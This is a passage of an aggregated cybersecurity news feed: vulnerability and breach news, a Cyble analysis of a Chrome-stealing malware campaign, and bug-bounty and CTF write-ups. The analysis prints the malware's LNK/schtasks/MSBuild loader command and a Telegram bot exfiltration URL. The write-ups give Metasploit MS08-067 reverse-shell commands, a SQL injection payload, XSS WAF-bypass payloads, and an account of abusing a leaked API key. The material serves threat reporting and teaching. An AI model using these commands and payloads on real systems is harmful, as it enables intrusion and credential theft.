health, this is a cybersecurity concern.   The vulnerability''s inclusion in the Known Exploited Vulnerabilities Catalog reflects the urgent need for PRTG users to update their systems to versions that resolve this issue.  CVE-2018-19410: Paessler PRTG Network Monitor Local File Inclusion  Another vulnerability in Paessler’s PRTG Network Monitor, CVE-2018-19410, is a Local File Inclusion (LFI) flaw. This vulnerability allows unauthenticated attackers to bypass security restrictions and escalate their privileges by crafting malicious HTTP requests. Attackers can exploit this flaw to create new users with administrator privileges or read-write access, thereby gaining control over the system.  Discovered in versions of PRTG prior to 18.2.40.1683, CVE-2018-19410 has been exploited in active attacks, making it a high-priority target for patching. By exploiting this vulnerability, attackers can manipulate the network monitoring system and access sensitive data, which could lead to serious security breaches.  Conclusion   The vulnerabilities listed in the Known Exploited Vulnerabilities Catalog, such as CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410, highlight the importance of proactive vulnerability management. Organizations must regularly patch their systems to avoid exploitation, especially those handling sensitive data or critical infrastructure. Using advanced tools like Cyble can further strengthen defenses by providing real-time monitoring and insights.  

by The Cyber Express

Security researchers at WatchTowr have uncovered a widespread security risk arising from abandoned Amazon S3 storage buckets, demonstrating how attackers could have leveraged them to distribute malicious software updates, manipulate infrastructure deployments, and compromise networks across government, military, financial, and cybersecurity sectors. The scale of the issue, the researchers argue, could have made past supply … The post Forgotten S3 Buckets Risked Largest-Ever Supply Chain Attack appeared first on CyberInsider.

by Cyber Insider

A manufacturing company was hit with Akira ransomware in the early hours of the morning. See how Barracuda Managed XDR blocked the attack.

by Barracuda

A global phishing campaign is actively exploiting a legacy Microsoft authentication system to steal user credentials and bypass multi-factor authentication (MFA), targeting over 150 organizations.

by Hackread

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added four security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-45195 (CVSS score: 7.5/9.8) - A forced browsing vulnerability in Apache OFBiz that allows a remote attacker to obtain unauthorized

by The Hacker News

Overview  The Australian Cyber Security Centre (ACSC), part of the Australian Signals Directorate (ASD), has shared new information on cyber threats targeting individuals and organizations across the country. The ACSC has warned that Australians must remain vigilant and take immediate action to protect their personal and professional data.  Over the past few years, Australia has seen an alarming rise in cyberattacks, including phishing, ransomware, and denial-of-service attacks, which are impacting both businesses and private citizens. These cyberattacks often target vulnerabilities in online platforms and devices, aiming to steal sensitive information, disrupt services, or even demand ransom payments.  The ACSC has highlighted the rise of email scammers impersonating trusted organizations, such as the ACSC itself. These scammers often attempt to deceive users into disclosing personal details, such as passwords, bank information, or credit card numbers.  The Danger of Email Scammers  One of the most concerning tactics employed by cybercriminals is impersonating government agencies like the ACSC and the ASD. Email scammers frequently send fraudulent emails, often mimicking the ACSC''s official logo and email signature, to create a sense of urgency and pressure individuals into responding.   These scam messages often contain threats, such as warning users that their devices have been compromised or that their online activities are under investigation for illegal behavior. The scammers may ask recipients to click on dangerous links or download malicious software, further compromising their security.  To avoid falling victim to such scams, the ACSC recommends that anyone who receives an unsolicited message claiming to be from the center should be cautious and verify its authenticity. If you suspect an email or phone call to be fraudulent, do not engage with the sender. Instead, contact the ACSC directly at 1300 CYBER1 to confirm whether the communication was legitimate.  What to Do if You Suspect a Scam  If you believe that you have received a scam email or phone call, the ACSC recommends following these steps to ensure your security:  Do not click on any links or download any attachments from unsolicited emails.  If you’ve already clicked on a link or downloaded something suspicious, immediately contact the ACSC at 1300 CYBER1 for assistance.  Report the scam to ScamWatch to help others avoid falling victim to similar scams.  Block the sender of the suspicious email to prevent further contact.  If you received a phone call, hang up and call the ACSC directly at 1300 CYBER1 to verify the legitimacy of the call.  The ACSC urges all Australians to exercise caution when dealing with unsolicited requests for personal information, especially when it involves urgent threats or promises of rewards. Cybercriminals often use a variety of tactics to manipulate individuals into giving up their sensitive data, which can lead to identity theft, financial loss, or further exploitation.  Conclusion   Cybersecurity awareness is crucial for both individuals and businesses in Australia to protect against cyberattacks. By following basic cybersecurity practices, such as using strong passwords, enabling two-factor authentication, and keeping software up to date, Australians can reduce their risk of falling victim to cybercriminals.  The ACSC continues to offer vital resources and expert guidance to help secure networks and data, and is always ready to assist those affected by cybercrime. Staying informed, being proactive, and utilizing the ACSC’s support is key to protecting against cyber threats and ensuring a secure digital environment. To get help or report suspicious activity, Australians are encouraged to contact the ACSC at 1300 CYBER1.  The post Australian Cyber Security Centre Urges Immediate Action to Combat Email Scammers appeared first on Cyble.

by CYBLE

The Nigerian government has intensified its crackdown on financial fraud and cybercrime, arresting over 1,000 individuals in the past year and securing 152 convictions related to fraud and online scams. The post Nigeria Touts Cyber Success While African Cybercrime Surges appeared first on ZENDATA Cybersecurity.

by Zendata

The Taiwanese hardware maker says it has no plans patch the flaws impacting legacy router models © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Google has released the February 2025 Android security updates, addressing 48 vulnerabilities, notably a high-severity zero-day flaw in the Android kernel''s USB Video Class driver. The post Google fixes Android kernel zero-day exploited in attacks appeared first on ZENDATA Cybersecurity.

by Zendata

Key Takeaways Cyble Research and Intelligence Labs (CRIL) identified malware being spread via a ZIP file containing an .LNK file disguised as a PDF and an XML project file masquerading as a PNG to trick users into opening it. The filename suggests that the malware is likely targeting organizations in Vietnam, particularly in the Telemarketing or Sales sectors. The LNK file creates a scheduled task that runs every 15 minutes, executing MSBuild.exe to deploy malicious C# code. The malware is capable of bypassing Chrome’s App-Bound Encryption and deploying a stealer payload to target sensitive Chrome-related files. Additionally, it uses the Double Injection technique to carry out fileless execution to evade detection. The malware establishes a connection to the Threat Actor (TA) through the Telegram Web API for command execution. The malware enables the TA to change the Telegram bot ID and chat ID as required, offering flexibility in controlling their communication channels. Overview Cyble Research & Intelligence Labs (CRIL) discovered malware potentially targeting organizations in Vietnam, especially those in the Telemarketing or Sales sectors. The initial infection vector is unknown at present. This malware was discovered being delivered via a malicious ZIP archive containing an .LNK file disguised as a .PDF and an XML project file masquerading as a .PNG file, designed to deceive users into opening the fake PDF file. When executed, the shortcut file copies an XML project file to the Temp directory and initiates a command that creates a scheduled task running every 15 minutes. This task launches Microsoft Build Engine (MSBuild.exe) to execute embedded C# code from the XML file. The malicious code operates within the MSBuild.exe process, deploying different components based on the system''s architecture. Upon further execution, the malware establishes communication with the TA via the Telegram Web API and listens for commands from the attacker. Depending on the specific commands received, the malware can perform several malicious activities. These include bypassing Chrome’s app-bound encryption to steal a secret encryption key, deploying a custom stealer, and exfiltrating sensitive user data from the Chrome browser, such as cookies, login data, and account login data. Additionally, the malware allows the TA to modify the Telegram bot ID and chat ID as needed, providing flexibility in managing their communication channels. Furthermore, it can execute arbitrary commands through the Windows Command Prompt, allowing the TA to perform additional malicious activities on the infected system. To avoid detection, the malware employs a double injection technique—Process Injection and Reflective DLL Injection—to stealthily execute malicious code in memory without leaving traces on the disk, making it harder for traditional security solutions to detect. Infection chain: The figure below shows the infection chain of this attack. Figure 1 - Infection chain Technical Analysis Upon analyzing the ZIP file - “CV Telesale Trần Huỳnh Cẩm Duyên.zip” – we found that it contains a malicious LNK file “CV_Dinh Thi Thuy.pdf.lnk” and an XML project file “logo.png”. The attack begins with this malicious .LNK file - disguised with a .pdf extension - to deceive the user into opening it. Based on the filename, it is evident that TA is targeting individuals or organizations in Vietnam, primarily within the Telemarketing or Sales sectors. When the user attempts to open the LNK file, it executes the following command mentioned in the shortcut’s target, which is executed via command prompt: cmd.exe/c tar -xf Scan_document.zip|copy logo.png %temp%\darkmoon.xml &&schtasks /create /sc minute /mo 15 /tn Darkmoon_Gaming /tr ""%comspec% /c powershell -nop -w h Start-Process -N -F C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe -A %temp%\darkmoon.xml"" /f &&start ~logo.png Since ""Scan_document.zip"" was not found during analysis, it suggests that the original ZIP archive ""CV Telesale Trần Huỳnh Cẩm Duyên.zip"" might have contained ""Scan_document.zip"" within it. The above command copies the file ""logo.png"" to ""%temp%\darkmoon.xml"" and creates a scheduled task named ""Darkmoon Gaming"", which runs every 15 minutes after being triggered. Additionally, it displays a fake error message to deceive the user into believing that the PDF failed to open. Figure 2 - Fake error message Once the scheduled task is triggered, MSBuild.exe loads the project from the ""%temp%\darkmoon.xml"" file. As execution begins, the embedded C# code in the xml file performs an initial system check by verifying the number of processor cores. If the system has fewer than two CPU cores, the execution immediately halts and returns true, effectively preventing the malware from running on virtualized or low-resource environments that are often used for malware analysis. Figure 3 - Scheduled Task If execution continues, the malware identifies the system architecture (32-bit or 64-bit) and locates the default installation path of MSBuild.exe. Based on this information, the malware decrypts the necessary malicious components at runtime using a combination of Base64 decoding and XOR decryption, utilizing hardcoded encryption keys embedded within the project file. This method keeps the payload obfuscated in its static form, making it more difficult for traditional security tools to detect. The malicious components include a .NET executable that receives commands from the Threat Actor, an injector that delivers a payload capable of bypassing App Bound encryption, and a custom stealer designed to target Chrome-related files. Figure 4 - Decrypt using XOR and calling the InvokeMember function On a 64-bit machine, MSBuild.exe invokes the previously decrypted .NET file directly in memory using predefined parameters, ensuring execution without writing the payload into disk. The .NET payload processes the following critical parameters: Telegram Bot ID – Establishes communication with the TA’s Telegram bot for command-and-control (C2) operations. Chat ID – Chat instance for sending system details and receiving commands. Encrypted custom stealer – Steals sensitive information from Google Chrome, including Cookies, Login data, and Login data for Accounts, along with the encrypted Secret key. Encrypted Injector– Utilizes Double injection technique to inject Reflective DLL loader into memory. The loader then injects a malicious DLL that bypasses Chrome’s app-bound encryption. Figure 5 - InvokeMethod with its Telegram configuration The malware first collects the victim''s username and then transmits it to the Threat Actor''s Telegram bot using the SendMessage function. To obfuscate the data, it replaces backslashes (\) with ""+=...=+"" and formats the message using <code> and </code> HTML tags, as shown below. Figure 6 - Sends victim''s username via Telegram bot using the sendMessage API. After transmitting this information, the malware enters an infinite loop, constantly awaiting a response from the Telegram bot. Upon receiving a command, it processes the input and executes the appropriate action. Command Action 1 Sends the victim''s system name to the Telegram bot. 34 The malware receives a command containing the obfuscated string ""+=...=+"". It splits the command based on this delimiter and checks the number of resulting segments. If the count is exactly three, then it bypasses Chrome’s App-Bound Encryption and extracts the encryption key using an injector, sending it to the attacker via a Telegram bot. The segment count is four, then it executes the stealer payload to collect and exfiltrate Chrome-sensitive files. 91 Updates the Telegram bot ID and chat ID based on C&C server instructions. 45 unknown Any other commands Executes the received command using cmd.exe. Stealer Component Upon execution, the Stealer component scans the Chrome user directory at “%LOCALAPPDATA%\Google\Chrome\User Data\Default” to locate critical files, including ""Login data,"" ""Cookies,"" and ""Login Data for Accounts"". These files contain saved passwords, cookies, 2FA tokens, synced device credentials, autofill data, and other sensitive user information. Additionally, it extracts Chrome’s encrypted secret key from the ""Local State"" file using a regex pattern:“\s*.*?(?=""encrypted_key)""encrypted_key""\s*:\s*""(?<encKey>.*?)""” The extracted key is decrypted using the CryptUnprotectData Win32 API and, along with the stolen user data files, is archived into the %temp% directory for exfiltration. This decrypted key is essential for unlocking stored passwords and other encrypted browser data, enabling unauthorized access to sensitive accounts and personal information. Figure 7 - Data Staged for exfiltration Injector Component Starting from Chrome version 127, the Application-Bound Encryption method was introduced to encrypt cookies by tying them to the browser’s identity, ensuring only Chrome can access them. Subsequent versions extended this security measure to protect other sensitive data, including passwords and credentials, further preventing unauthorized decryption by external applications. To bypass this restriction, the code in the injector component is hardcoded to target chrome_proxy.exe, located in the “\Google\Chrome\Application” directory. It launches “chrome_proxy.exe” in a suspended state using the CreateProcess API with the dwCreationFlags parameter set to CREATE_SUSPENDED. While the process remains suspended, the injector decrypts a payload in memory, which functions as a Reflective loader. This loader is then injected into the process chrome_proxy.exe and utilizes reflective DLL injection to load the embedded payload, ""DumpChromeKeyLoader.dll,” evading traditional antivirus detection. This process effectively employs a double injection technique, where the first injection loads the Reflective Loader, and the second injection loads the final payload into the target process. Figure 8 - Process Injection After injection, the “DumpChromeKeyLoader.dll” begins by locating the “Local State” file within the “AppData\Local\Google\Chrome\User Data” directory. This file contains critical Chrome configuration and security data, including the app_bound_encrypted_key, which is used to protect sensitive information such as cookies and saved passwords. The malware uses a Regex pattern to locate the app_bound_encrypted_key within the Local State file. The pattern “\s*.*?(?=""app_bound_encrypted_key)""app_bound_encrypted_key""\s*:\s*""(?<encKey>.*?)"" is employed to search for and extract the encrypted key. This pattern identifies the app_bound_encrypted_key string in the file and captures the encrypted key that follows it. Figure 9 - RegEx pattern After extracting the encrypted key, the malware invokes the DecryptData method from GoogleChromeElevationService to obtain the decrypted key. This allows it to bypass Chrome''s Application-Bound Encryption and access protected data, including saved passwords and cookies. Once decrypted, the malware saves the extracted key to the “%temp%\ei5m013o.0fh” file for exfiltration.   Figure 10 – Decrypting Chrome key Command Execution: The Threat Actor can also execute commands via command prompt. If the TA issues any command that does not match one of their predefined commands, it will be executed as ""cmd.exe /c <command>"" in hidden mode, and the output will be sent to the TA through the Telegram Web API, as shown below. Figure 11 - Command execution Exfiltration: After executing each command, the malware transmits the output or any errors to the Threat Actor (TA) via the Telegram Web API. This real-time communication allows the attacker to monitor execution results and adjust commands accordingly. Figure 12 - Exfiltration Conclusion: This attack leverages fileless execution, scheduled task persistence, and Telegram-based communication to evade detection while stealing sensitive data. By exploiting MSBuild.exe and using a double injection technique, the malware executes directly in memory, making it harder to detect. Its ability to bypass Chrome’s Application-Bound Encryption and extract credentials further strengthens its impact. The use of Telegram Web API for exfiltration and dynamic bot ID switching ensures continued control over infected systems. MITRE ATT&CK® Techniques Tactic Technique Procedure Execution (TA0002) Command and Scripting Interpreter: PowerShell (T1059.001) LNK file uses PowerShell commands to launch MSBuild.exe Execution (TA0002) Windows Command Shell (T1059.003) LNK file uses cmd.exe, and TA uses cmd.exe for Command Execution Execution (TA0002) User Execution: Malicious File (T1204.002) Tricks user into opening a .LNK file Persistence (TA0003) Scheduled Task/Job: Scheduled Task (T1053.005) A scheduled task is created to execute the payload every 15 mins Privilege Escalation (TA0004) Access Token Manipulation: Token Impersonation/Theft (T1134.001) Attempts to impersonate the system token during execution Defense Evasion (TA0005) Compile After Delivery (T1027.004) MSBuild.exe is used to execute malicious C# code Defense Evasion (TA0005) Deobfuscate/Decode Files or Information (T1140) Base64 decode, and XOR decryption is used to decode/decrypt the payloads Credential Access (TA0006) Credentials from Password Stores: Credentials from Web Browsers (T1555.003) Access Google Chrome user files, which contain credentials, tokens, session keys, cookies, and other sensitive information. Exfiltration (TA0010) Exfiltration Over Command and Control Channel (T1041) The stolen data is sent using the Telegram web API Collection (TA0009) Data Staged: Local Data Staging (T1074.001) The extracted sensitive data is compressed into an archive and staged for exfiltration. Collection (TA0009) Archive Collected Data: Archive via Library (T1560.002) Cookies,Login data file is archived into %Temp% directory Command and Control (TA0011) Application Layer Protocol: Web Protocols (T1071.001) The malware communicates with the TA’s Telegram bot, sending system information and receiving commands. Recommendations: Train users to recognize suspicious file extensions and avoid opening files from untrusted sources. Implement strict email filtering to block potentially harmful attachments. Use application whitelisting to prevent the execution of unauthorized files, particularly .LNK and .exe files. Enforce strict control over file execution paths and extensions. Deploy endpoint detection and response (EDR) tools that monitor and block suspicious activities, such as reflective DLL injection or the creation of scheduled tasks by unauthorized processes. Keep operating systems, browsers, and other software up to date with the latest security patches. This reduces the risk of exploits targeting known vulnerabilities. Enforce the principle of least privilege by ensuring that users and processes have access to the minimum necessary resources. This limits malware''s ability to escalate privileges and access sensitive data. Indicators of Compromise (IoCs): Indicator Type of Indicator Description 4c9a58b8a77a5f4c2e4a5ae070c25238aff20810b81e92393ef955f53e6eb5f3 SHA-256 CV Telesale Trần Huỳnh Cẩm Duyên.zip be210a706826056a9284d41ec13070d46a1465ea8eef8b8ae66c548dba7d3fd1 SHA-256 CV_Dinh Thi Thuy.pdf.lnk 94227bd384cbc499c7b8c43a2cb67a4e866a9ab0e59b3433271fe3d8a98f809b SHA-256 logo.png hxxps://api.telegram.org/bot7627703707:AAH6TL7Iw6muIVgNjoYcp0OkKmYFg2S1fVE/sendMessage URL Telegram web api The post Stealthy Attack: Dual Injection Undermines Chrome’s App-Bound Encryption appeared first on Cyble.

by CYBLE

The International Civil Aviation Organization (ICAO) is investigating a data breach affecting system and employee security. The International Civil Aviation Organization (ICAO), a specialized agency of the United Nations, is investigating a significant data breach that has raised concerns about the security of its systems and employees data. In the updated statement published by ICAO, […]

by Security Affairs

Kaspersky experts discover iOS and Android apps infected with the SparkCat crypto stealer in Google Play and the App Store. It steals crypto wallet data using an OCR model.

by Securelist

Organizations continue to be at high risk from cybercrime in Africa, despite law enforcement takedowns of cybercriminal syndicates in Nigeria and other African nations.

by Dark Reading

Explores IVR penetration testing methodologies, common vulnerabilities, and strategies to secure these critical systems against modern threats.

by Bishop Fox

Managing digital certificates in high-volume environments is complex, increasing the risk of outages, compliance failures, and security breaches. Automated Certificate Lifecycle Management (CLM) streamlines discovery, issuance, renewal, and revocation—reducing human errors, enhancing security, and cutting operational costs. By preventing downtime, improving compliance, and optimizing IT resources, automated CLM helps organizations maintain trust, reduce risk, and achieve significant cost savings.

by Sectigo

Image Credits: Windows XP — GearrirceAnother weekend project on the list, and this time, I am curious to find out how easy it is for a Windows XP operating system to be hacked.Windows XP has reached End of Life for security updates since Apr 8, 2014, as quoted by Microsoft.I’ve still been wondering if its an exaggeration that you shouldn’t be running this OS at all or if there’s a simple chance to run it and don’t get hacked.You Know Reaction GIF by MOODMANI’ve gotten a virtual machine setup with a Service Pack 3 copy of Windows XP Professional alongside my Penetration Testing operating system, Kali Linux.File and Printer SharingFile and Printer Sharing inside the Control Panel were already enabled alongside the Server service after checking the services.msc list within the operating system.However, I still wasn’t able to find an open port for at least one thing after scanning the machine with a basic nmap command.Not so fast, not yet.Doesn’t mean we’re unhackable right now. We’re still at risk if we open a malicious PDF or EXE (Executable) file.This OS is loaded with CVE’sWindows FirewallAfter adding an exception within the Windows Firewall for the File and Printer Sharing activity, then port 445, SMB was exposed to the local network.Running the following in Kali Linux, I was then able to observe port 445 with multiple vulnerabilities:nmap -Pn -A --script=vuln IP -vvWindows XP port scan on the Local NetworkI drifted my attention to the MS08–067 NET API vulnerability, which enables remote code execution (RCE).Setting up Metasploit to test the vulnerability, you can execute the following:msf6 > use exploit/windows/smb/ms08_067_netapi[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6> set RHOSTS IPmsf6> LHOST eth0msf6> runThis is the typical setup with Metasploit, but I used Armitage since the user interface was more productive for me.Meterpreter session 1 opened — MS08–067 Exploit on Windows XPWhat did we see here?No social engineering was needed.No need for opening/executing files on the target.Just an automatic exploit that needed one Firewall configuration change.A key takeaway that I wanted to demonstrate here was the gap between Vulnerability and Risk.In some context, there was no active risk until I enabled a Firewall exception for File and Printer Sharing (SMB, Port 445).Vulnerabilities do not imply immediate active risk unless there is a method and opportunity of exploitation.It should be noted, however, that Windows XP has reached EOL (End of Life) for security updates, and Windows XP is not recommended for production or development environments.A simple demonstration for a major concern.Happy Hacking!Windows XP is Hackable or Nah? Let’s Test That! was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Paginator v2 is a web challenge of the NullCon CTF 2025Link for challenge: http://52.59.124.14:5015/Paginator v2On accessing the link, I got a webpage like the one below:Paginator v2 webpageOn clicking “Show me pages 2–10”, it gives records of pages from ID 2 to 10.Pages from ID 2 to 10Now, I checked the source code of this webpage.Source code of Paginator v2Here, in the first try block, it executes a create table command and 10 insert commands. Unlike Paginator v1, where the flag was encoded as base64 string in the first record of pages table, here the flag is itself not in the pages table. So, basic SQL injection commands won’t work.Basic SQLi payload resultTherefore, I came to a conclusion that they might have made a new table related to it. So, I checked up on some union-based injection payloads. I guessed the name of the table to be “flag” and since I had no information on the no. of rows or the row in which the flag was present, I had to use an asterisk(*).So, the payload became:2,10 UNION SELECT * FROM flagUnion-based SQLi payload resultBINGO! I got the base64 encoded flag.Now, I just had to decode it.Decode base64 flagFLAG: ENO{SQL1_W1th_0uT_C0mm4_W0rks_SomeHow_AgA1n_And_Ag41n!}References:1. SQL Injection Using UNION2. Base64 Decode and Encode — OnlinePaginator v2- NullCon CTF 2025 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

XSS — Bypassing WAF with Hex OverflowHello, I’m Syed Mushfik Hasan Tahsin aka SMHTahsin33. A 20 Y/O Cyber Security Enthusiast from Bangladesh. Passionately doing Bug Bounties in my free time solely out of curiosity. I am an eWPTXv2 as well.Today I will be writing about how I bypassed BIG IP Local Traffic Manager (F5 Networks) Web Application Firewall using Hex Overflow.The story will be going with a straight flow, but in reality the situation was a little bit backward. More likely Solving the problem first, then knowing what the actual problem was.Before I start, A huge thanks to @Gareth Heyes for the invaluable help in gaining a deeper understanding of this!Let’s get started!The XSSInitially after observing that the input was unsanitized. I input a simple payload <svg onload=alert()> . This was immediately blocked.So I started probing until the block was gone, and came to <svg onload>, meaning onload= (with the equal sign) was actually getting blocked. After seeing this, I tried all possible event handlers there, and nothing worked out. Dead end?Introducing — Hex OverflowHex or Hexadecimal is a 16-Base number system allowing 0-F (0123456789ABCDEF) maxing out at FF. It is very much common to us that reserved or unsafe characters [RFC 1738 2.2] are encoded in the URL which is two Hex digits following a percent-sign ‘%’ like %23 is the hex representation of hash/fragment symbol ‘#’.Hex Overflow occurs when a malformed URL decoder is used while handling of URL & allows character over the hex limit of 0-F exceeding to the usage of other alphabets including the symbols too [ ] { } ; : < > ! & more.The decoder used in my target was a lot confusing & didn’t make sense at all to be honest. I can guess they also used more than one logic behind the decoder. The output was all in small letters adding up to the confusion more.What do you expect when you input %5% ? The output to is ‘e’ or 0x55. Wondering how? The decoder takes the first 5, then decoded the second ‘%’ symbol to %25 & ignores the first nibble ‘2’ and takes the 5 from there. Making it %55. And as it was a overflown character, it does a -1 from the first nibble of the result making it %45 a capital ‘e’. So %7% resulted in %65 or capital ‘e’. And yes, %8% , %6% resulted in %75 or small ‘u’ & %55 or capital ‘u’ respectively.Now you might be wondering how was it handling the alphabet parts of the hex? The answer is — pretty weirdly! In first stage it was handling abcdef normally but when overflowing it was calling the alphabets with a index number which started from ‘g’ as 0.Upon more observation, I found out that it can be used as 2 different sets. And When Mixed, it is something like this.If the any of the characters from two sets are used together a +1 can be seen to the first nibble, if it is from the set green, meaning a input of %5g which is %50 according to this chart will output ‘%(5+1)0’ or %60 → ` (Backtick). Again if it’s %hz (h is from the 2nd set) which is %13 according to the chart, it will output ‘%(1+2)3’ or %33 → ‘3’The worst part to all of these is that the pattern is not always constant and full workflow couldn’t be calculated. Sometimes it did +1, for some it did +2 or +3 and for some also a subtraction to the first nibble. But this understanding was enough for my bypass.The BypassAs in the beginning we saw that there were no ways this could possibly be bypassed as each and every handlers were blocked, we needed some other way around.Using Hex Overflow — we can generate a single ASCII character using a whole lot of different ways. If you already understand, you can actually represent the “=” equal sign (%3d) also by ‘%3=’ which can be explained like %3 %3d where the first nibble gets ignored making it again %3d. Also ‘%zd’, ‘%z=’, ‘%jd’, ‘%it’ (-1 from the first nibble in this case). We can use all of these in place of equal sign like <svg onload%jdonload=alert()>It again blocked our payload, reason? This time alert() was the blocked function. This was easily bypassed by optional chaining → alert?.() .It doesn’t just limit here, it can be bypassed using a lot of other ways generating different parts of payload using hex overflow like %0d (CR) to ‘%0=’ or ‘%w=’ making the payload <svg onload%w==alert()>.ConclusionThis kind of flawed decoders are very rare to encounter and all might not be flawed the same way. Playing with this was really fun for me.Follow Me 🔗:https://twitter.com/SMHTahsin33https://www.youtube.com/@SMHTahsin33https://www.facebook.com/smhtahsin33/Thanks for Reading, hope you all enjoyed. And don’t forget to share. Bye until next time 👋XSS — Bypassing WAF with Hex Overflow was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Your $2M security stack is useless if I’m lazier than your IT team.Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Hey there, fellow security enthusiasts! Today, we’re going to talk about something that might blow your mind. How an SMTP conversation can accidentally lead to exposing PII. Yeah, that’s right! Many organizations rely on SMTP (Simple Mail Transfer Protocol) for their email communications, but sometimes they don’t realize how easily sensitive data can leak through these conversations, especially when it’s misconfigured.I was hunting on a private program. I have done basic recon. And started checking one by one in scope domains and subdomains. There was signup functionality on the subdomain. I filled in mandatory details and tested signup functionalities. I was going through burp history. Then I found there was SMTP conversation in response when registration was successful. At the bottom of SMTP conversation there was a link of API, which sends an email and text message to the user after successful registration. They are using third-party API for sending emails and text messages on the contact number. That third-party API was using GET method.SMTP conversation in responseThat SMTP response revealed a third-party API key, which was revealing API key, username, message, sender’s name, and template ID. I simply copied that link and pasted it in the browser and — boom! You’ve got yourself a security risk. I received the same message a second time. I tried 4 times, and I received 4 text messages [financial loss]. I played with that API a few times. I was able to OTP or text, whatever I wanted to send, on any random number.Remaining BalanceThen I went to that third-party website and sign up for an account. And read documentation. I found the wallet and report API. When I hit the report API, I was able to see usernames, passwords [generated password], full names, and contact numbers. I tried to log in with those creds, and I was able to log in successfully.Date wise reportThat’s all fellas, Stay safe and keep hacking (ethically, of course 😉)!!!Instagram: th3.d1p4kTwitter: Dipak PanchalLinkedIn: Dipak PanchalPII Exposure: The Data Heist You Never Knew Was Possible! was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

In this post, we''ll delve into what SBOMs are, why they''re necessary, and their role in open source security.

by Snyk

Online food ordering and delivery platform GrubHub suffered a data breach that exposed the personal information of drivers and customers. This week the online food ordering and delivery firm GrubHub disclosed a data breach that exposed customer and driver information.  Recently, the company detected an anomalous activity within its infrastructure, then it launched an investigation […]

by Security Affairs

Explore the critical role of cyberattacks in shaping the modern space race. Learn how nation-states and organizations must adapt their cybersecurity measures to protect global economies, military operations, and the future of space exploration.

by Recorded Future

This vulnerability allows remote attackers to bypass authentication on affected installations of Logsign Unified SecOps Platform. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2025-1044.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Mintty. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-1052.

by Zero Day Initiative Advisories

Fraud groups are using cutting-edge technology to scale their operations to create fake identities and execute fraud campaigns.

by Dark Reading

The security startup''s autonomous security remediation platform uses off-the-shelf large language models (LLMs) to analyze security alerts and apply the fixes.

by Dark Reading

Netgear disclosed two critical flaws impacting multiple WiFi router models and urges customers to address them. Netgear addressed two critical vulnerabilities, internally tracked as PSV-2023-0039 and PSV-2021-0117, impacting multiple WiFi router models and urged customers to install the latest firmware. The two flaws are, respectively, a remote code execution issue and an authentication bypass vulnerability. […]

by Security Affairs

Researchers measured a threefold increase in credential stealing between 2023 and 2024, with more than 11.3 million such thefts last year.

by Dark Reading

Targets are lured into a fake interview process that convinces them to download malware needed for a virtual interview.

by Dark Reading

One of our customers, a financial sector company, had a complex backup strategy in place. Learn about the help and benefits they’re now getting from Barracuda Backup and Barracuda Cloud-to-Cloud Backup in this post.

by Barracuda

Israeli spyware maker Paragon Solutions confirmed to TechCrunch that it sells its products to the U.S. government and other unspecified allied countries. Paragon’s executive chairman John Fleming said in a statement to TechCrunch on Tuesday that “Paragon licenses its technology to a select group of global democracies — principally, the United States and its allies.” […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Recently, I started working with my children''s school to enhance their online safety measures and develop a digital mindfulness course in collaboration with their digital literacy lead.

by KnowBe4

Nearly half (46%) of businesses observed an increase in deepfakes and generative AI-related fraud last year, a new report from AuthenticID has found.

by KnowBe4

Cybersecurity researchers have called attention to a software supply chain attack targeting the Go ecosystem that involves a malicious package capable of granting the adversary remote access to infected systems. The package, named github.com/boltdb-go/bolt, is a typosquat of the legitimate BoltDB database module (github.com/boltdb/bolt), per Socket. The malicious version (1.3.1) was published to

by The Hacker News

Ransomware actors are offering individuals millions to turn on their employers and divulge private company information, in a brand-new cybercrime tactic.

by Dark Reading

Funnull CDN rents IPs from legitimate cloud service providers and uses them to host criminal websites, continuously cycling cloud resources in and out of use and acquiring new ones to stay ahead of cyber-defender detection.

by Dark Reading

Attacks on supply chains were one of the biggest threats in 2024. We discuss the most notable incidents of last year, and their consequences for the attacked.

by Kaspersky

A recently patched security vulnerability in the 7-Zip archiver tool was exploited in the wild to deliver the SmokeLoader malware. The flaw, CVE-2025-0411 (CVSS score: 7.0), allows remote attackers to circumvent mark-of-the-web (MotW) protections and execute arbitrary code in the context of the current user. It was addressed by 7-Zip in November 2024 with version 24.09. ""The vulnerability was

by The Hacker News

The North Korean threat actors behind the Contagious Interview campaign have been observed delivering a collection of Apple macOS malware strains dubbed FERRET as part of a supposed job interview process. ""Targets are typically asked to communicate with an interviewer through a link that throws an error message and a request to install or update some required piece of software such as VCam or

by The Hacker News

Bohemia Interactive, the developer behind Arma Platform and DayZ, has been struggling with a sustained distributed denial-of-service (DDoS) attack that has crippled its online services for over a week. The attack, which initially targeted Arma Reforger and DayZ servers, has left players unable to access official and community servers, leading to widespread frustration and speculation. … The post Ransom DDoS Attack Disrupts Bohemia Interactive’s Gaming Servers appeared first on CyberInsider.

by Cyber Insider

Home Affairs Minister Tony Burke said the Chinese AI app posed unacceptable risk.

by ITPro Today

The FBI joined authorities across Europe last week in seizing domain names for Cracked and Nulled, English-language cybercrime forums with millions of users that trafficked in stolen data, hacking tools and malware. An investigation into the history of these communities shows their apparent co-founders quite openly operate an Internet service provider and a pair of e-commerce platforms catering to buyers and sellers on both forums.

by Krebs on Security

